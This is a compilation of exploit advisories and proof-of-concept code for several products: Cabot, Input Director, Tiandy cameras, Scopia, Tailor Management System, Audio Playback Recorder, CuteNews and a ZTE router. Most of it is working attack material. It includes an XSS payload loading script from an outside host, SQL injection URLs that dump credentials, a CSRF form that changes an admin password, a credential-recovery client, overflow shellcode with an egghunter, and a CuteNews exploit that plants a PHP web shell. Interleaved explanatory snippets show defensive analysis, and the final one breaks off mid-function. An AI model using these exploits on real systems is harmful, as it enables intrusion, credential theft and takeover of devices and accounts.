X-Powered-By: PHP/7.3.21
Content-Length: 26

{"created_object_id":"21"}


Regards,
Mufaddal M
            
# Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting
# Date: 2020-09-06
# Exploit Author: Abhiram V
# Vendor Homepage: https://cabotapp.com/
# Software Link: https://github.com/arachnys/cabot
# Version: 0.11.12
# Tested on: Ubuntu Linux

############################################################################

Introduction

Cabot is a free, open-source, self-hosted infrastructure monitoring platform
that provides some of the best features of PagerDuty, Server Density, Pingdom
and Nagios without their cost and complexity. It provides a web interface that
allows you to monitor services and send telephone, SMS or HipChat/email alerts
to your on-duty team if those services start misbehaving or go down.

############################################################################

XSS details: Blind XSS

############################################################################

Executing blind XSS in New Instances leads to admin account takeover

URL
http://127.0.0.1:5000/instance/create/

PAYLOAD
"><script src=https://anonart.xss.ht></script>
*payload from the xsshunter.com platform for finding blind XSS*

PARAMETER
Address column

EXPLOITATION
Create a user account under the Django administrator account and log in as
that user to perform the attack.
Create a new instance and save it, then navigate to Services.
Create a new Service, then input a Name and URL (for the PoC I used
BlindXSS in both columns).
Then add the admin account in the "Users to notify" column, select the status
check and the instance, and save.
Now the admin account gets a notification; when the admin runs the check, the
blind XSS executes in the background.
On logging in to xsshunter.com we can see the screenshots, cookies and all
details of the admin account.

IMPACT
Stored XSS can be executed from any account and triggered in any account,
including Django administration, unknowingly by the victim (here the admin),
and compromise those accounts.

Tested with both xsshunter.com and blindf.com.
An attacker can also use stored XSS payloads here.

############################################################################
            
# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Input Director Service  InputDirector  C:\Program Files (x86)\InputDirector\IDWinService.exe  Auto

# Service info:

C:\>sc qc InputDirector
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InputDirector
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Input Director\IDWinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Input Director Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:

A successful attempt to exploit this vulnerability could allow a local user to execute
code during startup or reboot with the elevated privileges of the service (LocalSystem).
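The three unquoted-service-path findings on this page (NordVPN's nordvpn-service, ShareMouse Service, and Input Director's InputDirector service) share one mechanism: when BINARY_PATH_NAME is unquoted and contains spaces, the service control manager treats each space as a possible end of the executable name and tries the shorter candidates first. The following Python is an added example, not part of any of the three advisories: it parses a constructed wmic listing (in the column order wmic prints, which is alphabetical: DisplayName, Name, PathName, StartMode) and, for every auto-start service with an exploitable path, enumerates the image paths that would be executed ahead of the real binary. Whether a finding is exploitable depends on whether a standard user can create a file in one of those parent directories; on a default Windows 10 installation neither C:\ nor C:\Program Files (x86) allows that, so check each listed directory with icacls (or PowerUp's Get-UnquotedService, which does the write check for you) before rating the issue.

```python
import ntpath
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode` output.
# wmic emits the requested columns in alphabetical order (DisplayName, Name, PathName,
# StartMode) separated by runs of at least two spaces. The three unquoted entries reproduce
# the image paths reported above for NordVPN, ShareMouse and Input Director; the last two
# rows are controls (a quoted path with arguments, and a path without spaces).
WMIC_OUTPUT = r"""DisplayName             Name                PathName                                                 StartMode
nordvpn-service         nordvpn-service     C:\Program Files\NordVPN\nordvpn-service.exe             Auto
ShareMouse Service      ShareMouse Service  C:\Program Files (x86)\ShareMouse\smService.exe          Auto
Input Director Service  InputDirector       C:\Program Files (x86)\Input Director\IDWinService.exe   Auto
Good Service            GoodSvc             "C:\Program Files\Good\good.exe" -svc                    Auto
Spaceless               spaceless           C:\svc\spaceless.exe                                     Manual
"""


def parse_wmic_services(text):
    """Split wmic's fixed-width table into one dict per service, keyed by the header names."""
    lines = [line.rstrip() for line in text.splitlines() if line.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    return [dict(zip(header, re.split(r"\s{2,}", line.strip()))) for line in lines[1:]]


def hijack_candidates(pathname):
    """Image paths the service control manager tries, in order, before the real executable.

    CreateProcess resolves an unquoted path with spaces by treating each space as a possible
    end of the executable name and appending .exe. A quoted path has no such ambiguity.
    """
    path = pathname.strip()
    if path.startswith('"'):
        return []
    # Only the image itself matters; anything after the first .exe is arguments.
    end = path.lower().find(".exe")
    image = path if end < 0 else path[:end + 4]
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def find_unquoted_auto_services(wmic_text):
    """Name -> candidate hijack paths for every auto-start service with an exploitable image path."""
    findings = {}
    for row in parse_wmic_services(wmic_text):
        if row.get("StartMode", "").lower() != "auto":
            continue
        candidates = hijack_candidates(row.get("PathName", ""))
        if candidates:
            findings[row["Name"]] = candidates
    return findings


def directories_to_check(findings):
    """Parent directories an attacker would need file-create rights in; verify each with icacls."""
    return sorted({ntpath.dirname(c) for cands in findings.values() for c in cands})


if __name__ == "__main__":
    found = find_unquoted_auto_services(WMIC_OUTPUT)
    for name, cands in found.items():
        print(name)
        for c in cands:
            print("    would run first if it existed:", c)
    print("run icacls on each of:", directories_to_check(found))
```

For the three services above the script reports C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\Input.exe as the candidates, which reduces the whole class to two directories to audit: C:\ and C:\Program Files (x86).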
            
# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A


# Requires Python 3 and PyCrypto

# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research


import sys
import hashlib
import base64
import socket
import struct

from Crypto.Cipher import DES


def main():
  if len(sys.argv) != 2:
    print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
    exit(1)

  host = sys.argv[1]

  conn = Channel(host)
  conn.connect()

  crypt_key = conn.get_crypt_key(65536)

  attempts = 2
  tried_to_set_mail = False
  ok = False

  while attempts > 0:
    attempts -= 1

    code = get_psw_code(conn)

    if code == False:
      # psw not supported
      break

    elif code == None:
      if not tried_to_set_mail:
        print("No PSW data found, we'll try to set it...", file=sys.stderr)

        tried_to_set_mail = True
        if try_set_mail(conn, 'a@a.a'):
          code = get_psw_code(conn)

    if code == None:
      print("couldn't set mail", file=sys.stderr)
      break

    rcode, password = recover_with_code(conn, code, crypt_key)

    if rcode == 5:
      print('The device is locked, try again later.', file=sys.stderr)
      break

    if rcode == 0:
      print('Admin', password)
      ok = True
      break

  if tried_to_set_mail:
    try_set_mail(conn, '')

  if not code:
    print("PSW is not supported, trying default credentials...", file=sys.stderr)

    credentials = recover_with_default(conn, crypt_key)

    if credentials:
      user, pw = credentials
      print(user, pw)

      ok = True

  if not ok:
    print('Recovery failed', file=sys.stderr)
    exit(1)


def try_set_mail(conn, target):
  conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
  resp = conn.recv_msg()

  return resp[4:7] == ['RESERVEPHONE', '2', '1']

def get_psw_code(conn):
  conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
  resp = conn.recv_msg()

  if resp[4] != 'FINDPSW':
    return False

  psw_reg = psw_data = None

  if len(resp) > 7:
    psw_reg = resp[6]
    psw_data = resp[7]

  if not psw_data:
    return None

  psw_type = int(resp[5])

  if psw_type not in (1, 2, 3):
    raise Exception('unsupported psw type: '+str(psw_type))

  if psw_type == 3:
    psw_data = psw_data.split('"')[3]

  if psw_type == 1:
    psw_data = psw_data.split(':')[1]
    psw_key = psw_reg[:0x1f]

  elif psw_type in (2, 3):
    psw_key = psw_reg[:4].lower()

  psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
  code = hashlib.md5(psw_code).hexdigest()[24:]

  return code


def recover_with_code(conn, code, crypt_key):
  conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
  resp = conn.recv_msg()

  rcode = int(resp[6])

  if rcode == 0:
    return rcode, decode(resp[8].encode(), crypt_key).decode()

  return rcode, None


def recover_with_default(conn, crypt_key):
  res = conn.login_with_key(b'Default', b'Default', crypt_key)
  if not res:
    return False

  while True:
    msg = conn.recv_msg()

    if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
      return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()


###
### lib/des.py
###

def reverse_bits(data):
  return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])

def pad(data):
  if len(data) % 8:
    padlen = 8 - (len(data) % 8)
    data = data + b'\x00' * (padlen-1) + bytes([padlen])

  return data

def unpad(data):
  padlen = data[-1]

  if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
    data = data[:-padlen]

  return data

def encrypt(data, key):
  cipher = DES.new(reverse_bits(key), 1)
  return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))

def decrypt(data, key):
  cipher = DES.new(reverse_bits(key), 1)
  return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))

def encode(data, key):
  return base64.b64encode(encrypt(data, key))

def decode(data, key):
  return decrypt(base64.b64decode(data), key)


###
### lib/binproto.py
###

def recvall(s, l):
  buf = b''
  while len(buf) < l:
    nbuf = s.recv(l - len(buf))
    if not nbuf:
      break

    buf += nbuf

  return buf

class Channel:
  def __init__(self, ip, port=3001):
    self.ip = ip
    self.ip_bytes = socket.inet_aton(ip)[::-1]
    self.port = port
    self.msg_seq = 0
    self.data_seq = 0
    self.msg_queue = []

  def fileno(self):
    return self.socket.fileno()

  def connect(self):
    self.socket = socket.socket()
    self.socket.connect((self.ip, self.port))

  def reconnect(self):
    self.socket.close()
    self.connect()

  def send_cmd(self, data):
    self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
    self.msg_seq += 1

  def send_data(self, stream_type, data):
    self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
    self.data_seq += 1


  def recv(self):
    hdr = recvall(self.socket, 20)
    if hdr[:4] == b'\xf1\xf5\xea\xf9':
      lsize, stream_type = struct.unpack('<14xHI', hdr)
      data = recvall(self.socket, lsize - 20)

      if data[:4] != b'NVS\x00':
        print(data[:4], b'NVS\x00')
        raise Exception('invalid data header')

      return None, [stream_type, data[8:]]


    elif hdr[:4] == b'\xf1\xf5\xea\xf5':
      lsize, dsize = struct.unpack('<6xH10xH', hdr)

      if lsize != dsize + 20:
        raise Exception('size mismatch')

      msgs = []

      for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
        msg = msg.split('\t')
        if '.' not in msg[0]:
          msg = [self.ip] + msg

        msgs.append(msg)

      return msgs, None

    else:
      raise Exception('invalid packet magic: ' + hdr[:4].hex())

  def recv_msg(self):
    if len(self.msg_queue):
      ret = self.msg_queue[0]
      self.msg_queue = self.msg_queue[1:]

      return ret

    msgs, _ = self.recv()

    if len(msgs) > 1:
      self.msg_queue.extend(msgs[1:])

    return msgs[0]

  def send_msg(self, msg):
    self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())

  def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
    self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])

    resp = self.recv_msg()

    if resp[4:6] != ['LOGONFAILED', '3']:
      print(resp)
      raise Exception('unrecognized login response')

    crypt_key = base64.b64decode(resp[8])
    return crypt_key

  def login_with_key(self, uname, pw, crypt_key):
    self.reconnect()

    hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
    hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())

    self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
    resp = self.recv_msg()

    if resp[4] == 'LOGONFAILED':
      return False

    self.msg_queue = [resp] + self.msg_queue

    return True

  def login(self, uname, pw):
    crypt_key = self.get_crypt_key(1, uname, pw)

    if not self.login_with_key(uname, pw, crypt_key):
      return False

    return crypt_key



###
### lib/crypt.py
###

pat = b'abcdefghijklmnopqrstuvwxyz0123456789'

def td_asctonum(code):
  if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
    code += 0x20

  if code not in pat:
    return None

  return pat.index(code)


def td_numtoasc(code):
  if code < 36:
    return pat[code]

  return None

gword = [
  b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
  b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
  b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
  b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
  b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
  b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
  b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
  b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
  b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
  b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
  b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
  b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
  b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
  b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
  b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
  b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
  b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
  b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
  b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
  b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
  b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
  b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
  b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
  b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
  b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
  b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
  b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
  b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
  b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
  b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
  b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
  b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
  b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
  b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
  b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
  b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]

def td_decrypt(data, key):
  kdx = 0
  ret = []

  for idx, code in enumerate(data):
    while True:
      if kdx >= len(key):
        kdx = 0

      kcode = key[kdx]
      knum = td_asctonum(kcode)

      if knum is None:
        kdx += 1
        continue

      break

    if code not in gword[knum]:
      return None

    cpos = gword[knum].index(code)
    ret.append(td_numtoasc(cpos))

    kdx += 1

  return bytes(ret)



if __name__ == '__main__':
    main()
            
# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
# Google Dork: inurl:scopia+index.jsp
# Date: 2020-09-09
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://avaya.com
# Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605
# Version: 8.3.915.4
# Tested on: Windows 10 Pro
# CVE : N/A
# PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4


# CSRF to change admin password
# The admin password will be changed to "attacker"

<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
            
# Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
            
# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif

# Proof of Concept:
# 1.- Run the python script; it will create the files "poc.txt" and "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to the clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything in the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste the clipboard (poc.txt) into the parameter "Name".
# 10.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
# Payload size: 447 bytes

buf = b"w00tw00t"
buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52"
buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65"
buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b"
buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42"
buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51"
buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36"
buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67"
buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34"
buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51"
buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e"
buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79"
buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c"
buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51"
buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53"
buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d"
buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57"
buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b"
buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45"
buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54"
buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63"
buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b"
buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c"
buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30"
buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79"
buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58"
buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37"
buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50"
buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70"
buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73"
buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71"
buf += b"\x75\x67\x70\x41\x41"

egg = ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10023B71)

buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200

f = open ("poc.txt", "w")
f.write(buffer)
f.close()

f = open ("buf.txt", "w")
f.write(buf)
f.close()
            
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys


banner = """


           _____     __      _  __                     ___   ___  ___ 
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                ___  _________                        
                               / _ \/ ___/ __/                        
                              / , _/ /__/ _/                          
                             /_/|_|\___/___/                          
                                                                      

                                                                                                                                                   
"""
print (banner)
print ("[->] Usage python3 exploit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
            print ("[-] No hashes were found skipping!!!")
            return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass
def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()
def send_payload(payload):
    global ip
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")

    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print ()
            
# Exploit Title: ZTE Router F602W - Captcha Bypass 
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5 
# Tested on: F602W 
# CVE: CVE-2020-6862

Background
-----------
A captcha is used to make sure a form is being filled in by a real person
rather than an automated script. It is a very popular safety measure, and
bypassing it could lead to compromise.

Introduction
------------
While logging in to the affected device you are presented with username,
password and captcha fields. Submitting the form results in an HTTP request
being sent to /checkValidateCode.gch to validate the captcha; if it is
valid, the login request is then really submitted. This can be easily
bypassed because the verification is client-side: one can ignore the
response and forcefully submit the form via JavaScript (by calling the
subpageSubmit() method).
A typical login request looks like this:

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1

frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything

Firing the same request twice, however, fails with the text "Error" at the
top of the page, which pretty much defeats our purpose. It turns out that
on every login attempt the parameter Frm_Logintoken is incremented by one
and must match the server-side value. This is easily handled with some
pattern matching, allowing any script to bypass the captcha and log in.

Threat
-------
A captcha bypass can really help in brute-forcing the credentials, but
luckily the router limits login attempts to 3. In the real world, though,
things are a bit different. The affected ZTE router ships with a default
password. Given that devices on the same ISP network can reach each other,
it would be a matter of time before someone writes a script to log in to
every router on the network and take control of it.

PoC
-------

#!/bin/bash

SERVER=192.168.1.1
USER="admin"
PASS="admin"

getToken(){
	curl -s  --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}

Frm_Logintoken=`getToken`

s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)
if [[ $s -eq 302 ]]; then
	echo "Logged in"
	echo "Open http://$SERVER/start.ghtml"
	echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
	echo "Failed"
fi
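The root cause described above is that the captcha result is checked by a separate request and the login handler itself trusts whatever arrives in the form. The following is an added example (not part of the advisory and not ZTE code) that models, in Python, the server-side shape that closes the gap: the captcha answer is stored per session, verified inside the login handler, consumed on first use, and the Frm_Logintoken counter plus the 3-attempt lockout the advisory mentions are enforced in the same place. LoginGate, issue_captcha, MAX_ATTEMPTS and the in-memory session table are assumptions for the model.

```python
import hmac
import secrets

MAX_ATTEMPTS = 3  # the advisory notes the router locks the login after 3 tries


def _eq(a, b):
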